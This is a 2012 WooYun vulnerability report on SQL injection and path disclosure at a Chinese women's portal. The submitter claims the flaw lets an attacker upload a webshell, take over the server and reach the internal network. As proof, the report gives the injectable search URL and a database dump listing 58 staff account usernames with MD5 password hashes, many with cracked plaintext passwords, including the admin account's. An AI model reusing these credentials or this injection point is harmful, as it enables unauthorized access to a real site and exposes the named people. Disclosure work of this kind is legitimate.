当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011041

漏洞标题:悦已女性网主站存在高危SQL注射、路径暴露(导致渗透内网)

相关厂商:悦已女性网

漏洞作者: 小蝎

提交时间:2012-08-19 11:35

修复时间:2012-10-03 11:36

公开时间:2012-10-03 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-10-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

悦已女性网主站存在的高危SQL注射可上传webshell提权拿下服务器……下一步走向内网。。。

详细说明:

1、没有对参数过滤完善,导致SQLi;
2、某些敏感本地路径泄漏给第三方非法入侵者;

漏洞证明:

http://www.self.com.cn:80/search?word=%E6%9D%88%E6%92%B3%E5%8F%86%E9%8F%82%E5%9B%A9%E7%8F%B7%E9%8D%8F%E6%8A%BD%E6%95%AD%E7%92%87


available databases [3]:
[*] information_schema
[*] selfcms
[*] test
Database: selfcms
[53 tables]
+----------------------+
| interface_pushdata |
| interface_ucdata |
| iphone_ad |
| iphone_app |
| iphone_cat |
| iphone_catbind |
| iphone_news |
| iphone_news_pic |
| news_backup |
| news_btest |
| news_btestlist |
| news_btestrconf |
| news_btestresult |
| news_btesttitle |
| news_bvote |
| news_bvotelist |
| news_bvoteresult |
| news_bvotetext |
| news_bvotetitle |
| news_cat |
| news_click |
| news_collect |
| news_comment |
| news_gallery |
| news_gallerybackup |
| news_good |
| news_link |
| news_linkcat |
| news_list |
| news_pic |
| news_publish |
| news_relation |
| news_sorelation |
| news_source |
| news_tagorder |
| news_tagorderbak |
| news_taguser |
| news_temptag |
| news_temptagorder |
| news_temptagorderbak |
| news_type |
| sys_log |
| sys_model |
| sys_relation |
| sys_role |
| sys_safe |
| sys_sessions |
| sys_user |
| t_blog |
| t_home |
| wap_cat |
| wap_catbind |
| wap_news |
+----------------------+
Database: selfcms
Table: sys_user
[5 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| logtime | int(10) |
| pwd | varchar(255) |
| rid | int(10) |
| uid | int(10) |
| uname | varchar(255) |
+---------+--------------+
Database: selfcms
Table: sys_user
[58 entries]
+----------------------------------------------+--------------+
| pwd | uname |
+----------------------------------------------+--------------+
| 3303c726f4bd2fefe446deb858a8a324 | andy |
| c84603e717b817bf490acfbc80774136 | angel |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | baoqiang.shu |
| 3d97d01c581203cb76e01cfa90e7df41 | changchang |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | changxin |
| 289c5801e0a25d30c85af1a700849fe4 | cuichong |
| 39cc0a8e01493dd2c806938ead3cc8c5 | ella |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | fangfang |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | gaishengping |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | grace |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | heenim |
| 698d51a19d8a121ce581499d7b701668 (111) | helen |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Hezi |
| 698d51a19d8a121ce581499d7b701668 (111) | joanna |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Joanne |
| 698d51a19d8a121ce581499d7b701668 (111) | joy |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Juno |
| 972227ee9efa66b3576f3421ba2e945c | LC |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | leah |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | lunar |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | magazine |
| 50345be32c5eccd42aa05e4af81e65d4 | mengmeng |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Michelle |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Myra |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | nancy |
| ea72434e1e7334ae8ea7090d9956769c (self123) | Olive |
| a7bf138da1885d43884364c7891403f9 | promotion |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | rachel |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Rebecca |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | Ricky |
| 957b3e0bda8a68e2cee02b49d73ef9e1 (self1234) | selfadmin |
| ea72434e1e7334ae8ea7090d9956769c (self123) | shalei |
| ea72434e1e7334ae8ea7090d9956769c (self123) | silvie |
| ea72434e1e7334ae8ea7090d9956769c (self123) | sunnywang |
| ea72434e1e7334ae8ea7090d9956769c (self123) | terry |
| ea72434e1e7334ae8ea7090d9956769c (self123) | testself |
| ea72434e1e7334ae8ea7090d9956769c (self123) | uunatalie |
| ea72434e1e7334ae8ea7090d9956769c (self123) | wander |
| ea72434e1e7334ae8ea7090d9956769c (self123) | wyq |
| b43577e36c58228a66ffd68033ee7f21 (joanna123) | xiaoluo |
| 5b3391431125afca0976c7a212f0bf71 | ydl |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | yolanda |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | yueyue |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | yuki |
| 698d51a19d8a121ce581499d7b701668 (111) | zoe |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | 吉吉 |
| a850eabffbe6d2ebbdb762c2b6b4c53e | 安小二蓝 |
| 3736ddce77e0312871a44196ebcf1565 | 宋明 |
| ea72434e1e7334ae8ea7090d9956769c (self123) | 张颖 |
| 661474d719b81a980fe3dc92154bff08 | 李莎 |
| 5dcfc4b8f31defbfcb4c15a1e7486637 | 梁峰 |
| 47c02fd75e077b68fd3074a245669401 (lisha) | 楚楚 |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | 沙琨 |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | 莎椤紫月 |
| 590f53e8699817c6fa498cc11a4cbe63 (self) | 郄斯 |
| ea72434e1e7334ae8ea7090d9956769c (self123) | 郑乃玉 |
| 8e9afcd74f354c094f829081e4919b7d | 闫欧 |
| ea72434e1e7334ae8ea7090d9956769c (self123) | 鬼鬼 |
+----------------------------------------------+--------------+

修复方案:

过滤。

版权声明:转载请注明来源 小蝎@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝